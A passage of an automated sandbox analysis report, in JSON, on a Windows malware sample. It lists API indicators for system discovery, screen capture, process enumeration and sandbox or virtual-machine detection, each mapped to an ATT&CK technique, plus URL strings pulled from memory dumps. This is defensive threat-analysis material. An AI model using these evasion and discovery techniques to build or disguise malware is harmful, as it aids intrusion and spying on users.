\"GetSystemInfo\" (Indicator: \"GetSystemInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetSystemInfo\" (Indicator: \"GetSystemInfo\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-167", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the contents of the STARTUPINFO structure (API string)", "description": "Found reference to API \"GetStartupInfoA\" (Indicator: \"GetStartupInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")", "origin": "File/Memory", "attck_id": "T1543", "attck_id_wiki": "https://attack.mitre.org/techniques/T1543"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-365", "type": 2, "relevance": 1, "name": "Contains ability to perform scheduled transfer (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1029", "attck_id_wiki": "https://attack.mitre.org/techniques/T1029"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"IsWow64Process\" with parameter \"5952\" - (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-125", "type": 6, "relevance": 3, "name": "Calls an API typically used to get system version information", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"RtlGetVersion\" with parameter 140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00005952)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-661", "type": 2, "relevance": 1, "name": "Able to identify virtual environment by using user activity (API string)", "description": "Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found string \"GetCursorPos\" (Indicator: \"GetCursorPos\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found string \"GetCursorPos\" (Indicator: \"GetCursorPos\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found string \"GetCommandLineA\" (Indicator: \"GetCommandLine\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/002"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-247", "type": 2, "relevance": 1, "name": "Contains ability to retrieve machine time (API string)", "description": "Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetSystemTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemTimeAsFileTime\" (Indicator: \"GetSystemTime\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1124", "attck_id_wiki": "https://attack.mitre.org/techniques/T1124"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-721", "type": 2, "relevance": 1, "name": "Able to visualize and control listed components (API string)", "description": "Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"PostMessageA\" (Indicator: \"postmessage\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"EnumWindows\" (Indicator: \"enumwindows\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"EnumChildWindows\" (Indicator: \"enumchildwindows\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SendMessageTimeoutA\" (Indicator: \"sendmessage\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1055.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/015"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"SHGetSpecialFolderLocation\" (Indicator: \"SHGetSpecialFolderLocation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfoSize\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetFileVersionInfoA\" (Indicator: \"GetFileVersionInfo\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetSystemDirectoryA\" (Indicator: \"GetSystemDirectory\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileSize\" (Indicator: \"GetFileSize\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"SHGetSpecialFolderLocation\" (Indicator: \"SHGetSpecialFolderLocation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileVersionInfoA\" (Indicator: \"GetFileVersionInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfo\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetFileVersionInfoSizeA\" (Indicator: \"GetFileVersionInfoSize\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetTempPathA\" (Indicator: \"GetTempPath\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetCurrentDirectoryA\" (Indicator: \"GetCurrentDirectory\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetFileAttributesA\" (Indicator: \"GetFileAttributes\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetWindowDC\" (Indicator: \"GetWindowDC\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetDesktopWindow\" (Indicator: \"GetDesktopWindow\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetWindowDC\" (Indicator: \"GetWindowDC\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetDIBits\" (Indicator: \"GetDIBits\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"BitBlt\" (Indicator: \"BitBlt\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"CreateCompatibleBitmap\" (Indicator: \"CreateCompatibleBitmap\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"CreateCompatibleDC\" (Indicator: \"CreateCompatibleDC\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-84", "type": 2, "relevance": 1, "name": "Contains ability to find logical drives of the machine (API string)", "description": "Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetLogicalDriveStringsA\" (Indicator: \"GetLogicalDriveStrings\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-534", "type": 2, "name": "Contains ability to read files (API string)", "description": "Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"ReadFile\" (Indicator: \"ReadFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"Process32Next\" (Indicator: \"Process32Next\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"Process32First\" (Indicator: \"Process32First\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"CreateToolhelp32Snapshot\" (Indicator: \"CreateToolhelp32Snapshot\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcessId\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStrings\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetEnvironmentStringsW\" (Indicator: \"GetEnvironmentStrings\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"361771895701,6028,3122,,Process32NextW,kernel32.dll,\"252:06:27.109\",RX=0,PX=0\" (Indicator: \"Process32Next\"; Source: \"00000000-00005952.00000003.75415.001C0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-164", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the fully qualified path of module (API string)", "description": "Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetModuleFileNameA\" (Indicator: \"GetModuleFileName\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-132", "relevance": 1, "name": "Contains ability to detect sandbox (imports API)", "description": "Found GetCursorPos() in an import section (Source: gegdsimsogm.exe)", "origin": "Static Parser", "attck_id": "T1497", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-317", "type": 2, "relevance": 1, "name": "Contains ability to retrieve address of exported function from a DLL (API string)", "description": "Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetProcAddress\" (Indicator: \"GetProcAddress\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-122", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the NetBIOS name of the local computer (API string)", "description": "Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetComputerNameA\" (Indicator: \"GetComputerName\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-80", "type": 2, "relevance": 1, "name": "Contains ability to determine disk drive type (API string)", "description": "Found reference to API \"GetDriveTypeA\" (Indicator: \"GetDriveType\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetDriveTypeA\" (Indicator: \"GetDriveType\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-83", "type": 2, "relevance": 1, "name": "Contains ability to enumerate files on disk (API string)", "description": "Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"FindNextFileA\" (Indicator: \"FindNextFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"FindFirstFileA\" (Indicator: \"FindFirstFile\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-131", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the specified system metric or system configuration setting (API string)", "description": "Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetSystemMetrics\" (Indicator: \"GetSystemMetrics\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-427", "type": 2, "relevance": 1, "name": "Contains ability to retrieve a module handle (API string)", "description": "Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetModuleHandleA\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-115", "type": 2, "relevance": 3, "name": "Contains ability to retrieve data about the local computer (API string)", "description": "Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"InterlockedExchange\" (Indicator: \"InterlockedExchange\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-205", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the time elapsed since the system was started (API string)", "description": "Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetTickCount\" (Indicator: \"GetTickCount\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-121", "type": 2, "relevance": 1, "name": "Contains ability to retrieve usernames and/or user information (API string)", "description": "Found reference to API \"GetProcessWindowStation\" (Indicator: \"GetProcessWindowStation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; File: \"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc\")\n Found reference to API \"GetProcessWindowStation\" (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetUserNameA\" (Indicator: \"GetUserName\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetTokenInformation\" (Indicator: \"GetTokenInformation\"; Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found reference to API \"GetProcessWindowStation\" (Indicator: \"GetProcessWindowStation\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")\n Found reference to API \"GetUserObjectInformationA\" (Indicator: \"GetUserObjectInformation\"; Source: \"00000000-00005952.00000001.67978.00407000.00000002.mdmp\")", "origin": "File/Memory", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "api-103", "type": 6, "relevance": 3, "name": "Calls an API typically used for taking snapshot of the specified processes", "description": "\"0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc.exe\" called \"CreateToolhelp32Snapshot\" with parameters {\"dwFlags\": \"4\"\n \"th32ProcessID\": \"0\"}", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "static-88", "relevance": 1, "name": "Imports GetCommandLine API", "description": "Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: 0ef46f3686f60e1b6801fb27d2cb316597f31b59d79fd77e8685c1999b5f32bc]\n Observed import api \"GetCommandLineA\" which can \"Retrieves the command-line string for the current process\" [Source: gegdsimsogm.exe]", "origin": "Static Parser", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "string-3", "type": 2, "relevance": 3, "name": "Found potential URL in binary/memory", "description": "Heuristic match: \"se;.wsf;.ws\"\n Heuristic match: \"th<.td\"\n Pattern match: \"www.ebay.com/\"\n Pattern match: \"www.baidu.com/\"\n Pattern match: \"www.imdb.com/\"\n Pattern match: \"www.bbc.co.uk/\"\n Pattern match: \"www.adobe.com/\"\n Pattern match: \"www.blogger.com/\"\n Pattern match: \"www.wikipedia.org/\"\n Pattern match: \"www.yahoo.com/\"\n Pattern match: \"www.youtube.com/\"\n Pattern match: \"www.myspace.com/\"\n Pattern match: \"www.facebook.com/\"\n Pattern match: \"www.google.com/\"\n Pattern match: \"http://%s/\"\n Pattern match: \"http://schemas.xmlsoap.org/soap/encoding/\"\n Pattern match: \"http://schemas.xmlsoap.org/soap/envelope/\"\n Heuristic match: \"command.com\"", "origin": "File/Memory", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "Network Related", "identifier": "memorydump-2", "type": 20, "relevance": 1, "name": "Found potential URLs in memory dumps", "description": "Found URL \"http://nulllsatpcidbtlc.dat%s/%s=%dskypetooltips_class32twittersvchost.exeunknownsedebugprivilege:\\system\" - Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found URL \"http://%s/urlbasemodelnamefriendlynameget\" - Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found URL \"http://schemas.xmlsoap.org/soap/encoding/\" - Source: \"00000000-00000336.00000000.74072.0042A000.00000002.mdmp\")\n Found URL \"http://schemas.xmlsoap.org/soap/envelope/\" - Source: 